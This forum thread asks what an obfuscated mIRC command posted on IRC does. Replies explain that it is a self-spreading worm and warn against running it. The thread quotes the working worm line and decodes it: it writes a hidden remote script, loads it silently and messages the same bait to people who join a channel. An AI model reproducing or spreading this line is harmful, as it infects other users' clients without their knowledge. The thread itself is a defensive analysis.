mIRC question :\


Question

Okay, I was on IRC today (AustNet, to be specific) and some lamer told me to paste this into the main channel.

As I'm not an idiot, I told the person to go F@#$ off and ignored him.

He said this code lets you get OPs in the channel.

Obviously it doesn't, or he would have been an OP in the channel.

So what does this do?

  Quote
//$decode( d3JpdGUgxCBvbiAqOmpvaW46IzoudGltZXIgMSAzMCBpZiAoICRuaWNrICFpc29wICRjaGFuICkgLm1zZyAkbmljayBoZXkgJG5pY2sgdG8gZ2V0IE9QcyB1c2UgdGhpcyBoYWNrIGluIHRoZSBjaGFuIGJ1dCBTSEghIAM0Ly8kICQrIGRlY29kZSggJGVuY29kZSh3cml0ZSDEICRyZWFkKCRzY3JpcHQsbiwxKSxtKSAsbSkgJCAkKyBjaHIoMTI0KSAkICQgJCsgKyBkZWNvZGUoICRlbmNvZGUoLmxvYWQgLXJzIMQsbSkgLG0p ,m) | $decode( LmxvYWQgLXJzIMQ= ,m)

9 answers to this question



That is basically an IRC worm, with no payload.

The encoded stuff ($decode with the m switch is mime/base64) decodes to a remote which is something along the lines of this (from memory; I just *had* to find out what it did!):

on join 1:/msg $$1 "hey, type this to get ops in any channel! //$decode( d3JpdGUgxCBvbiAqOmpvaW46IzoudGltZXIgMSAzMCBpZiAoICRuaWNrICFpc29wICRjaGFuICkgLm1zZyAkbmljayBoZXkgJG5pY2sgdG8gZ2V0IE9QcyB1c2UgdGhpcyBoYWNrIGluIHRoZSBjaGFuIGJ1dCBTSEghIAM0Ly8kICQrIGRlY29kZSggJGVuY29kZSh3cml0ZSDEICRyZWFkKCRzY3JpcHQsbiwxKSxtKSAsbSkgJCAkKyBjaHIoMTI0KSAkICQgJCsgKyBkZWNvZGUoICRlbmNvZGUoLmxvYWQgLXJzIMQsbSkgLG0p ,m) | $decode( LmxvYWQgLXJzIMQ= ,m)"

So once you've run the decode line, it writes a file into your mIRC folder (the filename decodes to a single Ä character) and silently loads it as a remote script. Then whenever someone joins the channel you're in, you (unknowingly) msg them the same stuff you were sent in the first place.
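
For the curious, here's roughly what the two base64 blobs decode to if you run them through a mime decoder (I've written the unprintable 0x03 colour control character as ␃; the Ä really is in there, it's the filename):

  Quote
; first blob: writes a one-line remote script into a file literally named Ä.
; $read($script,n,1) re-reads the script's own first line and $encode re-mimes
; it, so the msg it sends out rebuilds the same base64 bait it arrived as
write Ä on *:join:#:.timer 1 30 if ( $nick !isop $chan ) .msg $nick hey $nick to get OPs use this hack in the chan but SHH! ␃4//$ $+ decode( $encode(write Ä $read($script,n,1),m) ,m) $ $+ chr(124) $ $ $+ + decode( $encode(.load -rs Ä,m) ,m)
; second blob: quietly loads that file as a remote script (the . suppresses the confirmation)
.load -rs Ä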

Absolutely pointless, apart from spreading itself and giving the writer some weird pleasure!

Long story short: you were wise not to run it. :)

Hope that's clear enough!

Jon



Edit: sorry, I didn't see that someone had already explained what it did...

(removed explanation)

But...

If anyone wants to check what a command does, you can put //echo in front of it.

The double // makes mIRC evaluate any $identifiers in the line before the command runs, so you see what would actually be executed.

So /echo $time would just echo the literal text $time, but //echo $time shows 23:18:43.

From the echoed result you can see it uses the write command... which isn't good if you don't know what it does.
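
For example, to peek at the shorter blob from that line without running it (assuming your copy of mIRC doesn't have $decode locked in the options, which newer versions do for exactly this reason):

  Quote
; prints the decoded text to the active window instead of executing it
//echo -a $decode( LmxvYWQgLXJzIMQ= ,m)
; → .load -rs Ä

Do the same with the long blob and it prints the whole write command, again without executing anything.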

Hope that helps somewhat :)

Link to comment
https://www.neowin.net/forum/topic/13274-mirc-question/#findComment-108477
Share on other sites
